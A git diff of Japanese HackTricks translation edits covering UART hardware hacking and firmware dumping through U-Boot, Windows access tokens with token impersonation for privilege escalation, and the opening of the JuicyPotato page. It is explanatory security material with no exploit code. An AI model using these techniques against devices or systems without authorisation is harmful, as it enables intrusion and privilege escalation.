最も一般的な構成を8N1と呼びます:8ビットのデータ、パリティなし、1ビットのストップビット。たとえば、ASCIIコードのC、または0x43を8N1 UART構成で送信する場合、次のビットを送信します:0(スタートビット);0、1、0、0、0、0、1、1(バイナリでの0x43の値)、および0(ストップビット)。
|
||||
|
||||
![](<../../.gitbook/assets/image (761).png>)
|
||||
|
||||
|
@ -46,38 +46,38 @@ UARTと通信するためのハードウェアツール:
|
|||
|
||||
### UARTポートの識別
|
||||
|
||||
UARTには4つのポートがあります:**TX**(送信)、**RX**(受信)、**Vcc**(電圧)、および**GND**(グラウンド)。PCBに**`TX`**と**`RX`**の文字が**書かれている**4つのポートを見つけることができるかもしれません。ただし、指示がない場合は、**マルチメータ**または**ロジックアナライザ**を使用して自分で見つける必要があるかもしれません。
|
||||
UARTには4つのポートがあります:**TX**(送信)、**RX**(受信)、**Vcc**(電圧)、および**GND**(グラウンド)。PCBに**`TX`**と**`RX`**の文字が**書かれている**4つのポートを見つけることができるかもしれません。ただし、指示がない場合は、**マルチメーター**または**ロジックアナライザー**を使用して自分で見つける必要があるかもしれません。
|
||||
|
||||
**マルチメータ**とデバイスの電源を切った状態で:
|
||||
**マルチメーター**とデバイスの電源を切った状態で:
|
||||
|
||||
- **GND**ピンを特定するには、**連続性テスト**モードを使用し、バックリードをグラウンドに置き、赤いリードでテストして、マルチメータから音が聞こえるまで試してください。複数のGNDピンがPCB上に見つかる場合がありますので、UARTに属するものを見つけたかどうかはわかりません。
|
||||
- **VCCポート**を特定するには、**DC電圧モード**を設定し、20Vの電圧に設定します。黒いプローブをグラウンドに、赤いプローブをピンに置きます。デバイスの電源を入れます。マルチメータが3.3Vまたは5Vの定電圧を測定した場合、Vccピンを見つけたことになります。他の電圧が表示される場合は、他のポートで再試行してください。
|
||||
- **GND**ピンを特定するには、**連続性テスト**モードを使用し、バックリードをグラウンドに置き、赤いリードでテストして、マルチメーターから音が聞こえるまで試してください。複数のGNDピンがPCB上に見つかる場合があるため、UARTに属するピンを見つけたかどうかはわかりません。
|
||||
- **VCCポート**を特定するには、**DC電圧モード**を設定し、20Vの電圧に設定します。黒いプローブをグラウンドに、赤いプローブをピンに置きます。デバイスの電源を入れます。マルチメーターが3.3Vまたは5Vの定電圧を測定した場合、Vccピンを見つけたことになります。他の電圧が表示される場合は、他のポートで再試行してください。
|
||||
- **TX** **ポート**を特定するには、**DC電圧モード**を20Vの電圧に設定し、黒いプローブをグラウンドに、赤いプローブをピンに置き、デバイスの電源を入れます。電源を入れると、一部のデバッグデータが送信されるため、数秒間電圧が変動し、その後Vcc値に安定する場合、おそらくTXポートを見つけたことになります。
|
||||
- **RXポート**は他の3つのポートに最も近く、UARTピンの中で最も低い電圧変動と最も低い全体的な値を持っています。
|
||||
- **RXポート**は他の3つに最も近いポートであり、UARTピンの中で最も低い電圧変動と最も低い全体値を持っています。
|
||||
|
||||
TXとRXポートを混同しても何も起こりませんが、GNDとVCCポートを混同すると回路を焼き切る可能性があります。
|
||||
|
||||
一部のターゲットデバイスでは、製造元によってUARTポートが無効にされている場合があります。その場合、基板内の接続を追跡し、いくつかのブレイクアウトポイントを見つけることが役立ちます。UARTの検出がないことと回路の切断を確認する強力なヒントは、デバイスの保証を確認することです。デバイスが保証付きで出荷された場合、製造元はいくつかのデバッグインターフェイス(この場合はUART)を残し、デバッグ中にUARTを切断し、デバッグが終了すると再度接続します。これらのブレイクアウトピンは、はんだ付けまたはジャンパーワイヤーで接続できます。
|
||||
一部のターゲットデバイスでは、製造元によってUARTポートが無効にされている場合があります。その場合、基板内の接続を追跡し、いくつかのブレイクアウトポイントを見つけることが役立つ場合があります。UARTの検出がないことと回路の切断を確認する強力なヒントは、デバイスの保証を確認することです。デバイスに保証が付属して出荷された場合、製造元はいくつかのデバッグインターフェイス(この場合はUART)を残し、したがって、UARTを切断し、デバッグ中に再接続する必要があります。これらのブレイクアウトピンは、はんだ付けまたはジャンパーワイヤーで接続できます。
|
||||
|
||||
### UARTボーレートの識別
|
||||
|
||||
正しいボーレートを特定する最も簡単な方法は、**TXピンの出力を見てデータを読み取ろうとする**ことです。受信したデータが読めない場合は、データが読めるまで次の可能なボーレートに切り替えてください。これには、USBシリアルアダプタやBus Pirateなどの多目的デバイスと、[baudrate.py](https://github.com/devttys0/baudrate/)などのヘルパースクリプトを使用できます。最も一般的なボーレートは9600、38400、19200、57600、115200です。
|
||||
正しいボーレートを特定する最も簡単な方法は、**TXピンの出力を見てデータを読み取ろうとする**ことです。受信したデータが読み取れない場合は、データが読み取れるまで次の可能なボーレートに切り替えてください。これには、USBシリアルアダプタやBus Pirateなどの多目的デバイスと、[baudrate.py](https://github.com/devttys0/baudrate/)などのヘルパースクリプトを使用できます。最も一般的なボーレートは9600、38400、19200、57600、115200です。
|
||||
|
||||
{% hint style="danger" %}
|
||||
このプロトコルでは、1つのデバイスのTXを他のデバイスのRXに接続する必要があることに注意してください!
|
||||
{% endhint %}
|
||||
|
||||
## CP210X UART to TTYアダプタ
|
||||
## CP210X UART to TTYアダプター
|
||||
|
||||
CP210Xチップは、NodeMCU(esp8266搭載)などのプロトタイピングボードでシリアル通信に使用されます。これらのアダプタは比較的安価であり、ターゲットのUARTインターフェースに接続するために使用できます。デバイスには5つのピンがあります:5V、GND、RXD、TXD、3.3V。ターゲットがサポートする電圧に接続するように注意してください。最後に、アダプタのRXDピンをターゲットのTXDに、アダプタのTXDピンをターゲットのRXDに接続してください。
|
||||
CP210Xチップは、NodeMCU(esp8266搭載)などのプロトタイピングボードでシリアル通信に使用されます。これらのアダプターは比較的安価であり、ターゲットのUARTインターフェースに接続するために使用できます。デバイスには5つのピンがあります:5V、GND、RXD、TXD、3.3V。ターゲットがサポートする電圧に接続するようにして、損傷を防ぐために注意してください。最後に、アダプターのRXDピンをターゲットのTXDに、アダプターのTXDピンをターゲットのRXDに接続してください。
|
||||
|
||||
アダプタが検出されない場合は、ホストシステムにCP210Xドライバがインストールされていることを確認してください。アダプタが検出され、接続されたら、picocom、minicom、またはscreenなどのツールを使用できます。
|
||||
アダプターが検出されない場合は、ホストシステムにCP210Xドライバーがインストールされていることを確認してください。アダプターが検出され、接続されたら、picocom、minicom、またはscreenなどのツールを使用できます。
|
||||
|
||||
Linux/MacOSシステムに接続されたデバイスをリストアップするには:
|
||||
```
|
||||
ls /dev/
|
||||
```
|
||||
UART インターフェースとの基本的なやり取りには、次のコマンドを使用します:
|
||||
UART インターフェースとの基本的なやり取りには、次のコマンドを使用します:
|
||||
```
|
||||
picocom /dev/<adapter> --baud <baudrate>
|
||||
```
|
||||
|
@ -85,21 +85,23 @@ minicomを使用する場合は、次のコマンドを使用して構成しま
|
|||
```
|
||||
minicom -s
|
||||
```
|
||||
`Serial port setup`オプションでボーレートやデバイス名などの設定を構成します。
|
||||
```
|
||||
シリアルポートの設定(ボーレートやデバイス名など)を`Serial port setup`オプションで構成します。
|
||||
|
||||
構成後、`minicom`コマンドを使用してUARTコンソールを開始します。
|
||||
設定後、`minicom`コマンドを使用してUARTコンソールを開始します。
|
||||
|
||||
## Arduino UNO R3を使用したUART(取り外し可能なAtmel 328pチップボードを搭載)
|
||||
## Arduino UNO R3を使用したUART(取り外し可能なAtmel 328pチップボード)
|
||||
|
||||
UARTシリアルからUSBアダプタが利用できない場合、Arduino UNO R3をクイックハックとして使用できます。通常、どこでも入手可能なArduino UNO R3を使用することで、多くの時間を節約できます。
|
||||
UARTシリアルからUSBアダプタが利用できない場合、Arduino UNO R3をクイックハックで使用できます。通常、どこでも入手できるArduino UNO R3を使用することで、多くの時間を節約できます。
|
||||
|
||||
Arduino UNO R3には、ボード自体にUSBからシリアルへのアダプタが内蔵されています。UART接続を取得するには、ボードからAtmel 328pマイクロコントローラチップを抜き取るだけです。このハックは、Atmel 328pがボードにはんだ付けされていないArduino UNO R3バリアント(SMDバージョンが使用されている)で機能します。ArduinoのRXピン(デジタルピン0)をUARTインターフェースのTXピンに、ArduinoのTXピン(デジタルピン1)をUARTインターフェースのRXピンに接続します。
|
||||
Arduino UNO R3には、ボード自体にUSBからシリアルへのアダプタが内蔵されています。UART接続を取得するには、ボードからAtmel 328pマイクロコントローラチップを抜き取るだけです。このハックは、ボードにはAtmel 328pがはんだ付けされていないArduino UNO R3バリアントで機能します(SMDバージョンが使用されています)。ArduinoのRXピン(デジタルピン0)をUARTインターフェースのTXピンに接続し、ArduinoのTXピン(デジタルピン1)をUARTインターフェースのRXピンに接続します。
|
||||
|
||||
最後に、UARTインターフェースに応じてボーレートを設定して、Arduino IDEを使用することをお勧めします。メニューの`tools`セクションで`Serial Console`オプションを選択し、ボーレートを設定します。
|
||||
最後に、UARTインターフェースに応じてボーレートを設定して、Arduino IDEを使用することをお勧めします。
|
||||
|
||||
## Bus Pirate
|
||||
|
||||
このシナリオでは、プログラムのすべての出力をシリアルモニタに送信しているArduinoのUART通信をスニッフすることになります。
|
||||
```
|
||||
```bash
|
||||
# Check the modes
|
||||
UART>m
|
||||
|
@ -171,17 +173,17 @@ Escritura inicial completada:
|
|||
AAA Hi Dreg! AAA
|
||||
waiting a few secs to repeat....
|
||||
```
|
||||
## UARTコンソールを使用したファームウェアのダンプ
|
||||
## UARTコンソールを使用してファームウェアをダンプする
|
||||
|
||||
UARTコンソールは、ランタイム環境で基礎ファームウェアを操作する優れた方法を提供します。ただし、UARTコンソールアクセスが読み取り専用の場合、多くの制約が発生する可能性があります。多くの組み込みデバイスでは、ファームウェアはEEPROMに保存され、揮発性メモリを持つプロセッサで実行されます。したがって、ファームウェアは製造時の元のファームウェアがEEPROM自体にあり、新しいファイルは揮発性メモリのため失われる可能性があるため読み取り専用に保持されます。そのため、組み込みファームウェアを操作する際にファームウェアをダンプすることは貴重な取り組みです。
|
||||
UARTコンソールは、ランタイム環境で基盤ファームウェアを操作する優れた方法を提供します。ただし、UARTコンソールへのアクセスが読み取り専用の場合、多くの制約が発生する可能性があります。多くの組み込みデバイスでは、ファームウェアはEEPROMに保存され、揮発性メモリを持つプロセッサで実行されます。したがって、ファームウェアは読み取り専用に保持されており、製造時の元のファームウェアがEEPROM自体に内蔵されており、新しいファイルは揮発性メモリのため失われる可能性があります。そのため、組み込みファームウェアを操作する際にファームウェアをダンプすることは貴重な取り組みです。
|
||||
|
||||
これを行うための多くの方法があり、SPIセクションではさまざまなデバイスからファームウェアを直接抽出する方法が説明されています。ただし、物理デバイスや外部インタラクションを使用してファームウェアをダンプする前に、まずUARTを使用してファームウェアをダンプすることが推奨されます。
|
||||
これを行うための多くの方法があり、SPIセクションではさまざまなデバイスからファームウェアを直接抽出する方法が説明されています。ただし、物理デバイスや外部インタラクションを使用してファームウェアをダンプする前に、まずUARTを使用してファームウェアをダンプすることが推奨されています。
|
||||
|
||||
UARTコンソールからファームウェアをダンプするには、まずブートローダにアクセスする必要があります。多くの人気ベンダーはLinuxをロードするために <b>uboot</b>(Universal Bootloader)を使用しているため、<b>uboot</b>にアクセスすることが必要です。
|
||||
|
||||
<b>boot</b>ブートローダにアクセスするには、UARTポートをコンピュータに接続し、任意のシリアルコンソールツールを使用し、デバイスへの電源供給を切断します。セットアップが準備できたら、Enterキーを押して押し続けます。最後に、デバイスに電源を接続してブートさせます。
|
||||
<b>boot</b>ブートローダにアクセスするには、UARTポートをコンピュータに接続し、任意のシリアルコンソールツールを使用し、デバイスの電源供給を切断します。セットアップが完了したら、Enterキーを押し続けます。最後に、デバイスに電源を供給してブートさせます。
|
||||
|
||||
これにより、<b>uboot</b>のロードが中断され、メニューが表示されます。 <b>uboot</b>コマンドを理解し、それらをリストするためにヘルプメニューを使用することが推奨されます。これはおそらく `help` コマンドになります。異なるベンダーが異なる構成を使用しているため、それぞれを個別に理解することが必要です。
|
||||
これにより、<b>uboot</b>のロードが中断され、メニューが表示されます。 <b>uboot</b>コマンドを理解し、ヘルプメニューを使用してそれらをリストすることが推奨されます。これはおそらく `help` コマンドになります。異なるベンダーが異なる構成を使用しているため、それぞれを個別に理解する必要があります。
|
||||
|
||||
通常、ファームウェアをダンプするためのコマンドは次のとおりです:
|
||||
```
|
||||
|
@ -195,4 +197,4 @@ binwalk -e <filename.rom>
|
|||
```
|
||||
EEPROM内の可能な内容を、ヘックスファイルで見つかったシグネチャに基づいてリストします。
|
||||
|
||||
ただし、使用されている場合でも、<b>uboot</b>がアンロックされているとは限らないことに注意する必要があります。Enterキーが機能しない場合は、Spaceキーなどの異なるキーをチェックしてください。ブートローダーがロックされており中断されない場合、この方法は機能しません。デバイスのブート時にUARTコンソールの出力をチェックして、<b>uboot</b>がブートローダーであるかどうかを確認してください。ブート時に<b>uboot</b>が言及されるかもしれません。
|
||||
ただし、使用されている場合でも、<b>uboot</b>がアンロックされているとは限らないことに注意する必要があります。Enterキーが機能しない場合は、Spaceキーなどの異なるキーをチェックしてください。ブートローダーがロックされており中断されない場合、この方法は機能しません。デバイスのブート時にUARTコンソールの出力をチェックして、<b>uboot</b>がデバイスのブートローダーであるかどうかを確認してください。ブート時に<b>uboot</b>が言及されるかもしれません。
|
||||
|
|
|
@ -2,23 +2,23 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じて、ゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を通じて、ゼロからヒーローまでAWSハッキングを学びましょう</strong></a><strong>!</strong></summary>
|
||||
|
||||
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加**または[telegramグループ](https://t.me/peass)に参加し、**Twitter**で私をフォロー🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||||
* **ハッキングトリックを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
|
||||
* [**公式PEASS&HackTricksのスウェグ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||||
* **ハッキングテクニックを共有するには、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **および** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。**
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**企業やその顧客が** **スチーラーマルウェア**によって**侵害**されているかどうかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**企業やその顧客が** **スチーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -28,7 +28,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## アクセス トークン
|
||||
|
||||
**システムにログインした各ユーザーは、そのログオンセッションのセキュリティ情報を持つアクセス トークンを保持しています。** ユーザーがログオンすると、システムはアクセス トークンを作成します。**ユーザーの代わりに実行されるすべてのプロセスには、アクセス トークンのコピーがあります。** トークンには、ユーザー、ユーザーのグループ、およびユーザーの特権が識別されます。 トークンには、現在のログオンセッションを識別するログオンSID(セキュリティ識別子)も含まれています。
|
||||
**システムにログインした各ユーザーは、そのログオンセッションのセキュリティ情報を持つアクセス トークンを保持しています。** ユーザーがログオンすると、システムはアクセス トークンを作成します。**ユーザーの代理で実行されるすべてのプロセスには、アクセス トークンのコピーがあります。** トークンには、ユーザー、ユーザーのグループ、およびユーザーの特権が識別されます。 トークンには、現在のログオンセッションを識別するログオンSID(セキュリティ識別子)も含まれています。
|
||||
|
||||
この情報は、`whoami /all`を実行して確認できます。
|
||||
```
|
||||
|
@ -80,34 +80,34 @@ SeTimeZonePrivilege Change the time zone Disabled
|
|||
|
||||
### ローカル管理者
|
||||
|
||||
ローカル管理者がログインすると、**2つのアクセス トークンが作成**されます:1つは管理者権限を持ち、もう1つは通常の権限を持ちます。**デフォルトでは**、このユーザーがプロセスを実行するときは、**通常の**(管理者でない)**権限が使用されます**。このユーザーが管理者として何かを実行しようとすると(たとえば"管理者として実行")、**UAC**が許可を求めるために使用されます。\
|
||||
[**UACについて詳しく学びたい場合は、このページを読んでください**](../authentication-credentials-uac-and-efs/#uac)**。**
|
||||
ローカル管理者がログインすると、**2つのアクセス トークンが作成**されます:1つは管理者権限を持ち、もう1つは通常の権限を持ちます。**デフォルトでは**、このユーザーがプロセスを実行するときは、**通常**(管理者でない)**権限を使用**します。このユーザーが管理者として何かを**実行**しようとすると(たとえば"管理者として実行"を選択すると)、**UAC**が許可を求めるために使用されます。\
|
||||
UACについて[**詳しく学びたい場合は、このページを読んでください**](../authentication-credentials-uac-and-efs/#uac)**。**
|
||||
|
||||
### 資格情報ユーザーの模倣
|
||||
### 資格情報ユーザーの偽装
|
||||
|
||||
他のユーザーの**有効な資格情報**を持っている場合、それらの資格情報で**新しいログオン セッションを作成**できます:
|
||||
```
|
||||
runas /user:domain\username cmd.exe
|
||||
```
|
||||
**アクセス トークン** には、**LSASS** 内のログオン セッションの **参照** も含まれています。これは、プロセスがネットワークのオブジェクトにアクセスする必要がある場合に役立ちます。\
|
||||
次の方法で、ネットワーク サービスにアクセスするために **異なる資格情報を使用するプロセス** を起動できます:
|
||||
**アクセス トークン** には、**LSASS** 内のログオン セッションの **参照** も含まれており、プロセスがネットワークのオブジェクトにアクセスする必要がある場合に役立ちます。\
|
||||
ネットワーク サービスにアクセスするために **異なる資格情報を使用するプロセス** を起動できます。
|
||||
```
|
||||
runas /user:domain\username /netonly cmd.exe
|
||||
```
|
||||
### トークンの種類
|
||||
|
||||
利用可能なトークンには2種類あります:
|
||||
利用可能な2種類のトークンがあります:
|
||||
|
||||
- **プライマリトークン**:プロセスのセキュリティ資格情報の表現として機能します。プライマリトークンの作成とプロセスへの関連付けは昇格された特権を必要とするアクションであり、特権の分離の原則を強調しています。通常、認証サービスがトークンの作成を担当し、ログオンサービスがユーザーのオペレーティングシステムシェルとの関連付けを処理します。プロセスは作成時に親プロセスのプライマリトークンを継承します。
|
||||
- **模倣トークン**:サーバーアプリケーションが一時的にクライアントのアイデンティティを採用して安全なオブジェクトにアクセスするための権限を与えます。このメカニズムは次の4つの操作レベルに分層されます:
|
||||
- **プライマリトークン**:プロセスのセキュリティ資格情報の表現として機能します。プライマリトークンの作成とプロセスへの関連付けは、特権の分離の原則を強調するために昇格された特権を必要とするアクションです。通常、認証サービスがトークンの作成を担当し、ログオンサービスがユーザーのオペレーティングシステムシェルとの関連付けを処理します。プロセスは、作成時に親プロセスのプライマリトークンを継承します。
|
||||
- **模倣トークン**:サーバーアプリケーションが一時的にクライアントのアイデンティティを採用して安全なオブジェクトにアクセスするための権限を与えます。このメカニズムは、次の4つの操作レベルに分層されます:
|
||||
- **匿名**:未識別のユーザーと同様のサーバーアクセスを許可します。
|
||||
- **識別**:オブジェクトアクセスに使用せずにクライアントのアイデンティティをサーバーが確認できるようにします。
|
||||
- **模倣**:サーバーがクライアントのアイデンティティの下で操作できるようにします。
|
||||
- **委任**:模倣に似ていますが、サーバーが相互作用するリモートシステムにこのアイデンティティ仮定を拡張し、資格情報の保持を確保します。
|
||||
- **模倣**:サーバーがクライアントのアイデンティティの下で動作できるようにします。
|
||||
- **委任**:模倣と同様ですが、サーバーが相互作用するリモートシステムにこのアイデンティティ仮定を拡張し、資格情報の保持を確保します。
|
||||
|
||||
#### トークンの模倣
|
||||
|
||||
十分な特権がある場合、metasploitの**incognito**モジュールを使用して他の**トークン**を簡単に**リスト**および**模倣**できます。これは**他のユーザーであるかのようにアクションを実行**したり、このテクニックを使用して**特権を昇格**するのに役立ちます。
|
||||
十分な特権を持っている場合、metasploitの**incognito**モジュールを使用して他の**トークン**を簡単に**リスト**および**模倣**することができます。これは、**他のユーザーであるかのようにアクションを実行**したり、このテクニックを使用して**特権を昇格**するのに役立ちます。
|
||||
|
||||
### トークン特権
|
||||
|
||||
|
@ -123,11 +123,11 @@ runas /user:domain\username /netonly cmd.exe
|
|||
|
||||
このチュートリアルでトークンについて詳しく学ぶ:[https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) および [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)。
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかを確認するための**無料**機能を提供します。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供します。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
|
@ -139,10 +139,10 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですか?または、**PDFでHackTricksをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけます。
|
||||
- [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れます。
|
||||
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)。
|
||||
- **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSを入手**したいですか?または、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つけてください
|
||||
- [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
- **💬** [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
|
||||
- **ハッキングトリックを共有するには、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **および** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください**。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,32 +2,32 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong>を通じて**ゼロからヒーローまでAWSハッキングを学びましょう**!</summary>
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>からAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>!</strong></summary>
|
||||
|
||||
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで企業を宣伝**してみたいですか?または**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
|
||||
* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
* **[💬](https://emojipedia.org/speech-balloon/)Discordグループ**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||||
* **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||||
* **ハッキングトリックを共有するには、PRを** [**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ**](https://github.com/carlospolop/hacktricks-cloud) **に提出してください。**
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかを確認するための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りとランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、無料でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックして、無料でエンジンを試してみてください:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
{% hint style="warning" %}
|
||||
**JuicyPotatoは**Windows Server 2019およびWindows 10ビルド1809以降では動作しません。ただし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)を使用して、**同じ特権を利用して`NT AUTHORITY\SYSTEM`**レベルのアクセスを取得できます。_**チェック:**_
|
||||
**JuicyPotatoは** Windows Server 2019およびWindows 10ビルド1809以降では動作しません。ただし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、**[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**、**[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)を使用して、同じ特権を利用して`NT AUTHORITY\SYSTEM`**レベルのアクセスを獲得できます。_**チェック:**_
|
||||
{% endhint %}
|
||||
|
||||
{% content-ref url="roguepotato-and-printspoofer.md" %}
|
||||
|
@ -36,42 +36,42 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## Juicy Potato(黄金特権の悪用) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
|
||||
|
||||
_**RottenPotatoNG**_の甘いバージョンで、つまり**WindowsサービスアカウントからNT AUTHORITY\SYSTEMへの別のローカル特権昇格ツール**_
|
||||
